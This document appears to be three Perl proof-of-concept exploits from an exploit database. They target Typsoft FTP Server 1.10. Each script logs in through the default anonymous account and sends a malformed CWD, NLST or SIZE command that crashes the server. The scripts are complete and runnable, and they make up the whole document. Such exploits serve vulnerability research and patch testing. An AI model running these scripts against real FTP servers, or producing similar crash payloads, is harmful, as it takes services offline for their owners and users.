Exploit 1:


#!/usr/bin/perl
# Exploit Title: Typsoft FTP Server DoS CWD command
# Date: 02/06/2012
# Author: Balazs Makany
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows 7
# (does not work on Windows XP)
#
# Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
#
use IO::Socket;
$user = "USER anonymous\r\n";
$passw = "PASS anonymous@127.0.0.1\r\n";
$command = "CWD ";
$dos_input = "."x250;
$send = "\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);
$socket->recv($serverdata, 1024);
print $serverdata;
$socket->send($user);
$socket->recv($serverdata, 1024);
$socket->send($passw);
$socket->recv($serverdata, 1024);
$socket->send($command.$dos_input.$send);


Exploit 2:

#!/usr/bin/perl
# Exploit Title: Typsoft FTP Server DoS NLST command
# Date: 02/06/2012
# Author: Balazs Makany
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows 7
# (does not work on Windows XP)
#
# Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
#
use IO::Socket;
$user = "USER anonymous\r\n";
$passw = "PASS anonymous@127.0.0.1\r\n";
$command = "NLST ";
$dos_input = "/.../.../.../.../.../";
$send = "\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);
$socket->recv($serverdata, 1024);
print $serverdata;
$socket->send($user);
$socket->recv($serverdata, 1024);
$socket->send($passw);
$socket->recv($serverdata, 1024);
$socket->send($command.$dos_input.$send);


Exploit 3:

#!/usr/bin/perl
# Exploit Title: Typsoft FTP Server DoS SIZE command
# Date: 02/06/2012
# Author: Balazs Makany
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows 7
# (does not work on Windows XP)
#
# Please note, that you need to have a valid username/password to execute the malformed command on the server. The server comes with an enabled by default Anonymous account, which is used below.
#
use IO::Socket;
$user = "USER anonymous\r\n";
$passw = "PASS anonymous@127.0.0.1\r\n";
$command = "SIZE ";
$dos_input = "/.../.../.../.../.../";
$send = "\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
);
$socket->recv($serverdata, 1024);
print $serverdata;
$socket->send($user);
$socket->recv($serverdata, 1024);
$socket->send($passw);
$socket->recv($serverdata, 1024);
$socket->send($command.$dos_input.$send);